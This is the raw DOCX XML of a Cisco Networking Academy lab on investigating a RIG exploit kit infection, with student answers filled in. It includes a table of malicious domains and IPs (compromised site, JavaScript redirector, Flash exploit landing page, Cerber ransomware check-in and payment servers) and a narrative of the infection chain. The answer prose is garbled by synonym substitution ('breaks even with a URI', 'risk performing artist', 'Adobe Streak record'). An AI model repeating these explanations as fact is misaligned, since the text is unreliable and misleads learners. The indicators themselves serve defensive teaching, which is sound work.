          <w:rFonts w:cs="Times New Roman" w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:asciiTheme="majorBidi" w:cstheme="majorBidi" w:hAnsiTheme="majorBidi"/>
        </w:rPr>
        <w:t xml:space="preserve"> function do?</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It composes to the browser window. It makes an HTML shape and submits the variable NormalURL through POST. The NormalURL variable breaks even with a URI at tyu.benme.com.</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do you think the purpose of the getBrowser() function is?</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getBrowser() function determines the type of browser that the webpage is displayed in.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="BodyTextL50"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman" w:asciiTheme="majorBidi" w:cstheme="majorBidi" w:hAnsiTheme="majorBidi"/>
          <w:b/>
          <w:b/>
          <w:bCs/>
          <w:i/>
          <w:i/>
          <w:iCs/>
        </w:rPr>
      </w:pPr>
      <w:r>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Heading1"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="4"/>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Reflection</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Exploit Kits are fairly complex exploits that use a variety of methods and resources to carry out an attack. Interestingly EKs may be used to deliver diverse malware payloads. This is because the EK developer may offer the exploit kit as a service to other threat actors. Therefore, RIG EK has been associated with a number of different malware payloads. The following questions may require you investigate the data further using the tools that were introduced in this lab.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="ReflectionQ"/>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="62"/>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EK used a number of websites. Complete the table below.</w:t>
      </w:r>
    </w:p>
    <w:tbl>
      <w:tblPr>
        <w:tblStyle w:val="LabTableStyle"/>
        <w:tblW w:w="9773" w:type="dxa"/>
        <w:jc w:val="left"/>
        <w:tblInd w:w="0" w:type="dxa"/>
        <w:tblLayout w:type="fixed"/>
        <w:tblCellMar>
          <w:top w:w="14" w:type="dxa"/>
          <w:left w:w="115" w:type="dxa"/>
          <w:bottom w:w="14" w:type="dxa"/>
          <w:right w:w="115" w:type="dxa"/>
        </w:tblCellMar>
        <w:tblLook w:val="04a0" w:noHBand="0" w:noVBand="1" w:firstColumn="1" w:lastRow="0" w:lastColumn="0" w:firstRow="1"/>
      </w:tblPr>
      <w:tblGrid>
        <w:gridCol w:w="3116"/>
        <w:gridCol w:w="3093"/>
        <w:gridCol w:w="3564"/>
      </w:tblGrid>
      <w:tr>
        <w:trPr>
          <w:cnfStyle w:val="100000000000" w:firstRow="1" w:lastRow="0" w:firstColumn="0" w:lastColumn="0" w:oddVBand="0" w:evenVBand="0" w:oddHBand="0" w:evenHBand="0" w:firstRowFirstColumn="0" w:firstRowLastColumn="0" w:lastRowFirstColumn="0" w:lastRowLastColumn="0"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="3116" w:type="dxa"/>
            <w:tcBorders/>
            <w:shd w:color="auto" w:fill="DBE5F1" w:val="clear"/>
            <w:vAlign w:val="bottom"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:pStyle w:val="TableHeading"/>
              <w:widowControl/>
              <w:spacing w:before="120" w:after="120"/>
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman" w:asciiTheme="majorBidi" w:cstheme="majorBidi" w:hAnsiTheme="majorBidi"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:eastAsia="Calibri" w:cs="Times New Roman" w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:asciiTheme="majorBidi" w:cstheme="majorBidi" w:hAnsiTheme="majorBidi"/>
                <w:kern w:val="0"/>
                <w:lang w:val="en-US" w:eastAsia="en-US" w:bidi="ar-SA"/>
              </w:rPr>
              <w:t>URL</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="3093" w:type="dxa"/>
            <w:tcBorders/>
            <w:shd w:color="auto" w:fill="DBE5F1" w:val="clear"/>
            <w:vAlign w:val="bottom"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:pStyle w:val="TableHeading"/>
              <w:widowControl/>
              <w:spacing w:before="120" w:after="120"/>
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman" w:asciiTheme="majorBidi" w:cstheme="majorBidi" w:hAnsiTheme="majorBidi"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:eastAsia="Calibri" w:cs="Times New Roman" w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:asciiTheme="majorBidi" w:cstheme="majorBidi" w:hAnsiTheme="majorBidi"/>
                <w:kern w:val="0"/>
                <w:lang w:val="en-US" w:eastAsia="en-US" w:bidi="ar-SA"/>
              </w:rPr>
              <w:t>IP Address</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="3564" w:type="dxa"/>
            <w:tcBorders/>
            <w:shd w:color="auto" w:fill="DBE5F1" w:val="clear"/>
            <w:vAlign w:val="bottom"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:pStyle w:val="TableHeading"/>
              <w:widowControl/>
              <w:spacing w:before="120" w:after="120"/>
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman" w:asciiTheme="majorBidi" w:cstheme="majorBidi" w:hAnsiTheme="majorBidi"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:eastAsia="Calibri" w:cs="Times New Roman" w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:asciiTheme="majorBidi" w:cstheme="majorBidi" w:hAnsiTheme="majorBidi"/>
                <w:kern w:val="0"/>
                <w:lang w:val="en-US" w:eastAsia="en-US" w:bidi="ar-SA"/>
              </w:rPr>
              <w:t>Function</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:trPr/>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="3116" w:type="dxa"/>
            <w:tcBorders/>
            <w:vAlign w:val="bottom"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:pStyle w:val="TableText"/>
              <w:widowControl/>
              <w:spacing w:before="60" w:after="60"/>
              <w:jc w:val="left"/>
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman" w:asciiTheme="majorBidi" w:cstheme="majorBidi" w:hAnsiTheme="majorBidi"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:eastAsia="Calibri" w:cs="Times New Roman" w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:asciiTheme="majorBidi" w:cstheme="majorBidi" w:hAnsiTheme="majorBidi"/>
                <w:kern w:val="0"/>
                <w:lang w:val="en-US" w:eastAsia="en-US" w:bidi="ar-SA"/>
              </w:rPr>
              <w:t>www.bing.com</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="3093" w:type="dxa"/>
            <w:tcBorders/>
            <w:vAlign w:val="bottom"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:pStyle w:val="TableText"/>
              <w:widowControl/>
              <w:spacing w:before="60" w:after="60"/>
              <w:jc w:val="left"/>
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman" w:asciiTheme="majorBidi" w:cstheme="majorBidi" w:hAnsiTheme="majorBidi"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:eastAsia="Calibri" w:cs="Times New Roman" w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:asciiTheme="majorBidi" w:cstheme="majorBidi" w:hAnsiTheme="majorBidi"/>
                <w:kern w:val="0"/>
                <w:lang w:val="en-US" w:eastAsia="en-US" w:bidi="ar-SA"/>
              </w:rPr>
              <w:t>N/A</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="3564" w:type="dxa"/>
            <w:tcBorders/>
            <w:vAlign w:val="bottom"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:pStyle w:val="TableText"/>
              <w:widowControl/>
              <w:spacing w:before="60" w:after="60"/>
              <w:jc w:val="left"/>
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman" w:asciiTheme="majorBidi" w:cstheme="majorBidi" w:hAnsiTheme="majorBidi"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:eastAsia="Calibri" w:cs="Times New Roman" w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:asciiTheme="majorBidi" w:cstheme="majorBidi" w:hAnsiTheme="majorBidi"/>
                <w:kern w:val="0"/>
                <w:lang w:val="en-US" w:eastAsia="en-US" w:bidi="ar-SA"/>
              </w:rPr>
              <w:t>search engine links to legitimate webpage</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:trPr/>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="3116"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www.homeimprovement.com</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="3093"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104.28.18.74</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="3564"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malicious iFrame redirects to malicious site</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:trPr/>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="3116"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retrotip.visionurbana.com.ve</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="3093"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139.59.160.143</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="3564"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executes malicious javascript</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:trPr/>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="3116"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tyu.benme.com</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="3093"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194.87.234.129</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="3564"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delivers malicious Adobe Flash file, exploit landing page.</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:trPr/>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="3116"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n/a</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="3093"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90.2.10.0</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="3564"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Cerber ransomware checkin server</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:trPr/>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="3116"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p27dokhpz2n7nvgr.1jjw2lx.top</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="3093"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198.105.151.50</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="3564" w:type="dxa"/>
            <w:tcBorders/>
            <w:vAlign w:val="bottom"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:pStyle w:val="TableText"/>
              <w:widowControl/>
              <w:spacing w:before="60" w:after="60"/>
              <w:jc w:val="left"/>
              <w:rPr>
                <w:rStyle w:val="AnswerGray"/>
                <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman" w:asciiTheme="majorBidi" w:cstheme="majorBidi" w:hAnsiTheme="majorBidi"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rStyle w:val="AnswerGray"/>
                <w:rFonts w:eastAsia="Calibri" w:cs="Times New Roman" w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:asciiTheme="majorBidi" w:cstheme="majorBidi" w:hAnsiTheme="majorBidi"/>
                <w:kern w:val="0"/>
                <w:lang w:val="en-US" w:eastAsia="en-US" w:bidi="ar-SA"/>
              </w:rPr>
              <w:t>cerber ransomware page</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="ReflectionQ"/>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="6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It is useful to “tell the story” of an exploit to understand what happened and how it works. Start with the user searching the internet with Bing. Search the web for more information on the RIG EK to help.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="ReflectionQ"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="0"/>
        </w:numPr>
        <w:spacing w:before="120" w:after="120"/>
        <w:ind w:left="360" w:hanging="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 xml:space="preserve">The reason of this address is to begin understudies considering approximately the different step nature of EKs and the complexities of cyberattacks in common. </w:t>
        <w:br/>
        <w:t>The client is looking with Bing for data on domestic enhancements. The client clicks a connect to www.homeimprovments.com. This site has been compromised by a risk performing artist. A javascript executes that in the long run downloads a pernicious Adobe Streak record. The Streak record executes and downloads malware. After the malware is introduced, it checks in with a CnC server.</w:t>
      </w:r>
    </w:p>
    <w:sectPr>
      <w:headerReference w:type="default" r:id="rId17"/>
      <w:headerReference w:type="first" r:id="rId18"/>
      <w:footerReference w:type="default" r:id="rId19"/>
      <w:footerReference w:type="first" r:id="rId20"/>
      <w:type w:val="nextPage"/>
      <w:pgSz w:w="12240" w:h="15840"/>
      <w:pgMar w:left="1080" w:right="1080" w:gutter="0" w:header="720" w:top="1526" w:footer="720" w:bottom="129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
      <w:pBdr>
        <w:bottom w:val="single" w:sz="18" w:space="1" w:color="000000"/>
      </w:pBdr>
      <w:spacing w:before="60" w:after="60"/>
      <w:rPr/>
    </w:pPr>
    <w:sdt>
      <w:sdtPr>
        <w:id w:val="1853600857"/>
        <w:dataBinding w:prefixMappings="xmlns:ns0='http://purl.org/dc/elements/1.1/' xmlns:ns1='http://schemas.openxmlformats.org/package/2006/metadata/core-properties' " w:xpath="/ns1:coreProperties[1]/ns0:title[1]" w:storeItemID="{6C3C8BC8-F283-45AE-878A-BAB7291924A1}"/>
        <w:placeholder>
          <w:docPart w:val="590D3D55688E48DDB6EC995446F5394E"/>
        </w:placeholder>
        <w:alias w:val="Title"/>
        <w:text/>
      </w:sdtPr>
      <w:sdtContent>
        <w:r>
          <w:rPr/>
          <w:t>Lab 40 - Investigating a Malware Exploit</w:t>
        </w:r>
      </w:sdtContent>
    </w:sdt>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ind w:left="-288" w:hanging="0"/>
      <w:rPr/>
    </w:pPr>
    <w:r>
      <w:rPr/>
      <w:drawing>
        <wp:inline distT="0" distB="0" distL="0" distR="0">
          <wp:extent cx="1261110" cy="391795"/>
          <wp:effectExtent l="0" t="0" r="0" b="0"/>
          <wp:docPr id="15"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isco Network Academy logo"/>
                  <pic:cNvPicPr>
                    <a:picLocks noChangeAspect="1" noChangeArrowheads="1"/>
                  </pic:cNvPicPr>
                </pic:nvPicPr>
                <pic:blipFill>
                  <a:blip r:embed="rId1"/>
                  <a:stretch>
                    <a:fillRect/>
                  </a:stretch>
                </pic:blipFill>
                <pic:spPr bwMode="auto">
                  <a:xfrm>
                    <a:off x="0" y="0"/>
                    <a:ext cx="1261110" cy="39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o"/>
      <w:lvlJc w:val="left"/>
      <w:pPr>
        <w:tabs>
          <w:tab w:val="num" w:pos="1080"/>
        </w:tabs>
        <w:ind w:left="1080" w:hanging="360"/>
      </w:pPr>
      <w:rPr>
        <w:sz w:val="16"/>
        <w:i w:val="false"/>
        <w:b w:val="false"/>
        <w:color w:val="auto"/>
      </w:rPr>
    </w:lvl>
    <w:lvl w:ilvl="2">
      <w:start w:val="1"/>
      <w:numFmt w:val="none"/>
      <w:suff w:val="nothing"/>
      <w:lvlText w:val=""/>
      <w:lvlJc w:val="left"/>
      <w:pPr>
        <w:tabs>
          <w:tab w:val="num" w:pos="720"/>
        </w:tabs>
        <w:ind w:left="720" w:hanging="360"/>
      </w:pPr>
      <w:rPr>
        <w:color w:val="auto"/>
      </w:rPr>
    </w:lvl>
    <w:lvl w:ilvl="3">
      <w:start w:val="1"/>
      <w:numFmt w:val="none"/>
      <w:suff w:val="nothing"/>
      <w:lvlText w:val=""/>
      <w:lvlJc w:val="left"/>
      <w:pPr>
        <w:tabs>
          <w:tab w:val="num" w:pos="1080"/>
        </w:tabs>
        <w:ind w:left="1080" w:hanging="360"/>
      </w:pPr>
      <w:rPr/>
    </w:lvl>
    <w:lvl w:ilvl="4">
      <w:start w:val="1"/>
      <w:numFmt w:val="lowerLetter"/>
      <w:lvlText w:val="(%5)"/>
      <w:lvlJc w:val="left"/>
      <w:pPr>
        <w:tabs>
          <w:tab w:val="num" w:pos="0"/>
        </w:tabs>
        <w:ind w:left="2520" w:hanging="360"/>
      </w:pPr>
      <w:rPr/>
    </w:lvl>
    <w:lvl w:ilvl="5">
      <w:start w:val="1"/>
      <w:numFmt w:val="lowerRoman"/>
      <w:lvlText w:val="(%6)"/>
      <w:lvlJc w:val="left"/>
      <w:pPr>
        <w:tabs>
          <w:tab w:val="num" w:pos="0"/>
        </w:tabs>
        <w:ind w:left="2880" w:hanging="36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600" w:hanging="360"/>
      </w:pPr>
      <w:rPr/>
    </w:lvl>
    <w:lvl w:ilvl="8">
      <w:start w:val="1"/>
      <w:numFmt w:val="lowerRoman"/>
      <w:lvlText w:val="%9."/>
      <w:lvlJc w:val="left"/>
      <w:pPr>
        <w:tabs>
          <w:tab w:val="num" w:pos="0"/>
        </w:tabs>
        <w:ind w:left="3960" w:hanging="360"/>
      </w:pPr>
      <w:rPr/>
    </w:lvl>
  </w:abstractNum>
  <w:abstractNum w:abstractNumId="2">
    <w:lvl w:ilvl="0">
      <w:start w:val="1"/>
      <w:numFmt w:val="decimal"/>
      <w:suff w:val="space"/>
      <w:lvlText w:val="Part %1:"/>
      <w:lvlJc w:val="left"/>
      <w:pPr>
        <w:tabs>
          <w:tab w:val="num" w:pos="0"/>
        </w:tabs>
        <w:ind w:left="0" w:hanging="0"/>
      </w:pPr>
      <w:rPr/>
    </w:lvl>
    <w:lvl w:ilvl="1">
      <w:start w:val="1"/>
      <w:numFmt w:val="decimal"/>
      <w:suff w:val="space"/>
      <w:lvlText w:val="Task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4">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decimal"/>
      <w:suff w:val="space"/>
      <w:lvlText w:val="Step %3:"/>
      <w:lvlJc w:val="left"/>
      <w:pPr>
        <w:tabs>
          <w:tab w:val="num" w:pos="0"/>
        </w:tabs>
        <w:ind w:left="0" w:hanging="0"/>
      </w:pPr>
      <w:rPr/>
    </w:lvl>
    <w:lvl w:ilvl="3">
      <w:start w:val="1"/>
      <w:numFmt w:val="lowerLetter"/>
      <w:lvlText w:val="%4."/>
      <w:lvlJc w:val="left"/>
      <w:pPr>
        <w:tabs>
          <w:tab w:val="num" w:pos="720"/>
        </w:tabs>
        <w:ind w:left="72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5">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2">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3">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4">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5">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6">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7">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1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2">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3">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4">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5">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6">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7">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2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2">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3">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4">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5">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6">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7">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3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2">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3">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4">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5">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6">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7">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4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2">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3">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4">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5">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6">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7">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8">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59">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60">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61">
    <w:abstractNumId w:val="4"/>
    <w:lvlOverride w:ilvl="0">
      <w:lvl w:ilvl="0">
        <w:start w:val="1"/>
        <w:numFmt w:val="decimal"/>
        <w:suff w:val="space"/>
        <w:lvlText w:val="Part %1:"/>
        <w:lvlJc w:val="left"/>
        <w:pPr>
          <w:tabs>
            <w:tab w:val="num" w:pos="0"/>
          </w:tabs>
          <w:ind w:left="0" w:hanging="0"/>
        </w:pPr>
        <w:rPr/>
      </w:lvl>
    </w:lvlOverride>
    <w:lvlOverride w:ilvl="0"/>
    <w:lvlOverride w:ilvl="1">
      <w:lvl w:ilvl="1">
        <w:start w:val="1"/>
        <w:numFmt w:val="decimal"/>
        <w:suff w:val="space"/>
        <w:lvlText w:val="Task %2:"/>
        <w:lvlJc w:val="left"/>
        <w:pPr>
          <w:tabs>
            <w:tab w:val="num" w:pos="0"/>
          </w:tabs>
          <w:ind w:left="0" w:hanging="0"/>
        </w:pPr>
        <w:rPr/>
      </w:lvl>
    </w:lvlOverride>
  </w:num>
  <w:num w:numId="62">
    <w:abstractNumId w:val="6"/>
  </w:num>
  <w:num w:numId="63">
    <w:abstractNumId w:val="6"/>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uiPriority="0" w:semiHidden="1" w:unhideWhenUsed="1"/>
    <w:lsdException w:name="macro" w:uiPriority="0"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rsid w:val="00490807"/>
    <w:pPr>
      <w:widowControl/>
      <w:bidi w:val="0"/>
      <w:spacing w:lineRule="auto" w:line="276" w:before="60" w:after="60"/>
      <w:jc w:val="left"/>
    </w:pPr>
    <w:rPr>
      <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:eastAsia="Calibri" w:cs="Times New Roman"/>
      <w:color w:val="auto"/>
      <w:kern w:val="0"/>
      <w:sz w:val="22"/>
      <w:szCs w:val="22"/>
      <w:lang w:val="en-US" w:eastAsia="en-US" w:bidi="ar-SA"/>
    </w:rPr>
  </w:style>
  <w:style w:type="paragraph" w:styleId="Heading1">
    <w:name w:val="Heading 1"/>
    <w:basedOn w:val="Normal"/>
    <w:next w:val="BodyTextL25"/>
    <w:link w:val="Heading1Char"/>
    <w:uiPriority w:val="9"/>
    <w:unhideWhenUsed/>
    <w:qFormat/>
    <w:rsid w:val="00cf26e3"/>
    <w:pPr>
      <w:keepNext w:val="true"/>
      <w:keepLines/>
      <w:numPr>
        <w:ilvl w:val="0"/>
        <w:numId w:val="4"/>
      </w:numPr>
      <w:spacing w:lineRule="auto" w:line="240" w:before="240" w:after="120"/>
      <w:outlineLvl w:val="0"/>
    </w:pPr>
    <w:rPr>
      <w:b/>
      <w:bCs/>
      <w:sz w:val="26"/>
      <w:szCs w:val="26"/>
    </w:rPr>
  </w:style>
  <w:style w:type="paragraph" w:styleId="Heading2">
    <w:name w:val="Heading 2"/>
    <w:basedOn w:val="Normal"/>
    <w:next w:val="BodyTextL25"/>
    <w:link w:val="Heading2Char"/>
    <w:uiPriority w:val="9"/>
    <w:unhideWhenUsed/>
    <w:qFormat/>
    <w:rsid w:val="00cf26e3"/>
    <w:pPr>
      <w:keepNext w:val="true"/>
      <w:numPr>
        <w:ilvl w:val="1"/>
        <w:numId w:val="4"/>
      </w:numPr>
      <w:spacing w:lineRule="auto" w:line="240" w:before="240" w:after="120"/>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val="true"/>
      <w:numPr>
        <w:ilvl w:val="2"/>
        <w:numId w:val="4"/>
      </w:numPr>
      <w:spacing w:lineRule="auto" w:line="240" w:before="240" w:after="120"/>
      <w:outlineLvl w:val="2"/>
    </w:pPr>
    <w:rPr>
      <w:rFonts w:eastAsia="Times New Roman"/>
      <w:b/>
      <w:bCs/>
      <w:szCs w:val="26"/>
    </w:rPr>
  </w:style>
  <w:style w:type="paragraph" w:styleId="Heading4">
    <w:name w:val="Heading 4"/>
    <w:basedOn w:val="BodyTextL25"/>
    <w:next w:val="BodyTextL25"/>
    <w:link w:val="Heading4Char"/>
    <w:unhideWhenUsed/>
    <w:qFormat/>
    <w:rsid w:val="007c09d1"/>
    <w:pPr>
      <w:keepNext w:val="true"/>
      <w:spacing w:before="0" w:after="0"/>
      <w:ind w:left="720" w:hanging="0"/>
      <w:outlineLvl w:val="3"/>
    </w:pPr>
    <w:rPr>
      <w:rFonts w:eastAsia="Times New Roman"/>
      <w:bCs/>
      <w:color w:val="FFFFFF" w:themeColor="background1"/>
      <w:sz w:val="6"/>
      <w:szCs w:val="28"/>
    </w:rPr>
  </w:style>
  <w:style w:type="paragraph" w:styleId="Heading5">
    <w:name w:val="Heading 5"/>
    <w:basedOn w:val="Normal"/>
    <w:next w:val="Normal"/>
    <w:link w:val="Heading5Char"/>
    <w:unhideWhenUsed/>
    <w:qFormat/>
    <w:rsid w:val="00231dca"/>
    <w:pPr>
      <w:spacing w:lineRule="auto" w:line="240" w:before="240" w:after="60"/>
      <w:outlineLvl w:val="4"/>
    </w:pPr>
    <w:rPr>
      <w:rFonts w:eastAsia="Times New Roman"/>
      <w:b/>
      <w:bCs/>
      <w:i/>
      <w:iCs/>
      <w:sz w:val="26"/>
      <w:szCs w:val="26"/>
    </w:rPr>
  </w:style>
  <w:style w:type="paragraph" w:styleId="Heading6">
    <w:name w:val="Heading 6"/>
    <w:basedOn w:val="Normal"/>
    <w:next w:val="Normal"/>
    <w:link w:val="Heading6Char"/>
    <w:unhideWhenUsed/>
    <w:qFormat/>
    <w:rsid w:val="00231dca"/>
    <w:pPr>
      <w:spacing w:lineRule="auto" w:line="240" w:before="240" w:after="60"/>
      <w:outlineLvl w:val="5"/>
    </w:pPr>
    <w:rPr>
      <w:rFonts w:eastAsia="Times New Roman"/>
      <w:b/>
      <w:bCs/>
    </w:rPr>
  </w:style>
  <w:style w:type="paragraph" w:styleId="Heading7">
    <w:name w:val="Heading 7"/>
    <w:basedOn w:val="Normal"/>
    <w:next w:val="Normal"/>
    <w:link w:val="Heading7Char"/>
    <w:semiHidden/>
    <w:unhideWhenUsed/>
    <w:qFormat/>
    <w:rsid w:val="00231dca"/>
    <w:pPr>
      <w:spacing w:lineRule="auto" w:line="240" w:before="240" w:after="60"/>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lineRule="auto" w:line="240" w:before="240" w:after="60"/>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lineRule="auto" w:line="240" w:before="240" w:after="60"/>
      <w:outlineLvl w:val="8"/>
    </w:pPr>
    <w:rPr>
      <w:rFonts w:eastAsia="Times New Roman" w:cs="Arial"/>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cf26e3"/>
    <w:rPr>
      <w:b/>
      <w:bCs/>
      <w:sz w:val="26"/>
      <w:szCs w:val="26"/>
    </w:rPr>
  </w:style>
  <w:style w:type="character" w:styleId="Heading2Char" w:customStyle="1">
    <w:name w:val="Heading 2 Char"/>
    <w:link w:val="Heading2"/>
    <w:uiPriority w:val="9"/>
    <w:qFormat/>
    <w:rsid w:val="00cf26e3"/>
    <w:rPr>
      <w:rFonts w:eastAsia="Times New Roman"/>
      <w:b/>
      <w:bCs/>
      <w:sz w:val="26"/>
      <w:szCs w:val="26"/>
    </w:rPr>
  </w:style>
  <w:style w:type="character" w:styleId="HeaderChar" w:customStyle="1">
    <w:name w:val="Header Char"/>
    <w:basedOn w:val="DefaultParagraphFont"/>
    <w:link w:val="Header"/>
    <w:qFormat/>
    <w:rsid w:val="008402f2"/>
    <w:rPr>
      <w:sz w:val="22"/>
      <w:szCs w:val="22"/>
    </w:rPr>
  </w:style>
  <w:style w:type="character" w:styleId="FooterChar" w:customStyle="1">
    <w:name w:val="Footer Char"/>
    <w:link w:val="Footer"/>
    <w:uiPriority w:val="99"/>
    <w:qFormat/>
    <w:rsid w:val="00e859e3"/>
    <w:rPr>
      <w:sz w:val="16"/>
      <w:szCs w:val="22"/>
    </w:rPr>
  </w:style>
  <w:style w:type="character" w:styleId="BalloonTextChar" w:customStyle="1">
    <w:name w:val="Balloon Text Char"/>
    <w:link w:val="BalloonText"/>
    <w:uiPriority w:val="99"/>
    <w:semiHidden/>
    <w:qFormat/>
    <w:rsid w:val="0090659a"/>
    <w:rPr>
      <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
      <w:sz w:val="16"/>
      <w:szCs w:val="16"/>
    </w:rPr>
  </w:style>
  <w:style w:type="character" w:styleId="TableTextChar" w:customStyle="1">
    <w:name w:val="Table Text Char"/>
    <w:link w:val="TableText"/>
    <w:qFormat/>
    <w:rsid w:val="008b68e7"/>
    <w:rPr/>
  </w:style>
  <w:style w:type="character" w:styleId="DocumentMapChar" w:customStyle="1">
    <w:name w:val="Document Map Char"/>
    <w:link w:val="DocumentMap"/>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shd w:fill="BFBFBF" w:val="clear"/>
    </w:rPr>
  </w:style>
  <w:style w:type="character" w:styleId="LabSectionGray" w:customStyle="1">
    <w:name w:val="Lab Section Gray"/>
    <w:uiPriority w:val="1"/>
    <w:qFormat/>
    <w:rsid w:val="00be3a73"/>
    <w:rPr>
      <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
      <w:b w:val="false"/>
      <w:sz w:val="24"/>
      <w:shd w:fill="BFBFBF" w:val="clear"/>
    </w:rPr>
  </w:style>
  <w:style w:type="character" w:styleId="DevConfigGray" w:customStyle="1">
    <w:name w:val="DevConfig Gray"/>
    <w:uiPriority w:val="1"/>
    <w:qFormat/>
    <w:rsid w:val="00ad761f"/>
    <w:rPr>
      <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New"/>
      <w:b/>
      <w:color w:val="000000"/>
      <w:sz w:val="20"/>
      <w:shd w:fill="BFBFBF" w:val="clear"/>
    </w:rPr>
  </w:style>
  <w:style w:type="character" w:styleId="HTMLPreformattedChar" w:customStyle="1">
    <w:name w:val="HTML Preformatted Char"/>
    <w:link w:val="HTMLPreformatted"/>
    <w:uiPriority w:val="99"/>
    <w:semiHidden/>
    <w:qFormat/>
    <w:rsid w:val="00c6495e"/>
    <w:rPr>
      <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:eastAsia="Times New Roman" w:cs="Courier New"/>
    </w:rPr>
  </w:style>
  <w:style w:type="character" w:styleId="Annotationreference">
    <w:name w:val="annotation reference"/>
    <w:semiHidden/>
    <w:unhideWhenUsed/>
    <w:qFormat/>
    <w:rsid w:val="000b2344"/>
    <w:rPr>
      <w:sz w:val="16"/>
      <w:szCs w:val="16"/>
    </w:rPr>
  </w:style>
  <w:style w:type="character" w:styleId="CommentTextChar" w:customStyle="1">
    <w:name w:val="Comment Text Char"/>
